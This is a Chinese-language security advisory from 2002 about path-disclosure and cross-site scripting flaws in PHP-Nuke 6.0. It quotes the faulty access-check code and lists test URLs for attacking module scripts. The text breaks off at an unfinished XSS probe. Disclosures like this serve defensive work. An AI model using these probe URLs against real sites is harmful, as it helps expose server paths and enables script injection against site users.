积极预防 及时发现
快速响应 力保恢复
PHP-Nuke多个远程路径泄露&跨站脚本执行缺陷 (APP,补丁)
发布时间:2002-12-25 信息来源:管理员

涉及程序: PHP-Nuke 6.0 描述: PHP-Nuke多个远程路径泄露&跨站脚本执行缺陷 详细: PHP-Nuke是一个Web登录和在线社区系统。它可以使用许多数据库软件作为其后端数据库程序,如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。 PHPnuke包含的一些重要和敏感信息一般都包含在modules.php和index.php脚本中,为防止恶意用户对这些敏感脚本文件的非法访问,PHPNuke使用了两种方法进行限制: 第一种如在modules/Downloads/index.php中通过如下代码限制对\"modules.php\"的访问: --------------------------------------------------- if (!eregi(\"modules.php\", $PHP_SELF)) { die (\"You can\`t access this file directly...\"); } --------------------------------------------------- 第二种如通过如下代码限制对\"footer.php\"的访问: ------------------------------------ if (eregi(\"footer.php\",$PHP_SELF)) { Header(\"Location: index.php\"); die(); } ------------------------------------ 然而由于这些安全代码自身存在的一些安全缺陷,PHP-Nuke不能对用户提交的直接访问敏感脚本的请求进行正确处理,攻击者可利用此缺陷直接提交一些不能直接访问的脚本请求,导致服务器返回包含脚本绝对路径的信息。如果在脚本请求中嵌入精心构建的恶意代码,甚至可能在目标系统上执行任意指令。 受影响系统: PHP-Nuke 6.0 攻击方法: 路径泄露缺陷攻击测试: http:// /modules/Downloads/voteinclude.php http:// /modules/Your_Account/navbar.php http:// /modules/Forums/attachment.php http:// /modules/Forums/auth.php http:// /modules/News/comments.php http:// /modules/Private_Messages/functions.php http:// /modules/Private_Messages/index.php http:// /modules/Private_Messages/read.php http:// /modules/Private_Messages/reply.php http:// /modules/Web_Links/voteinclude.php http:// /modules/WebMail/contactbook.php?user=1 路径泄露&跨站脚本执行缺陷攻击测试: http:// /modules/Forums/bb_smilies.php?name=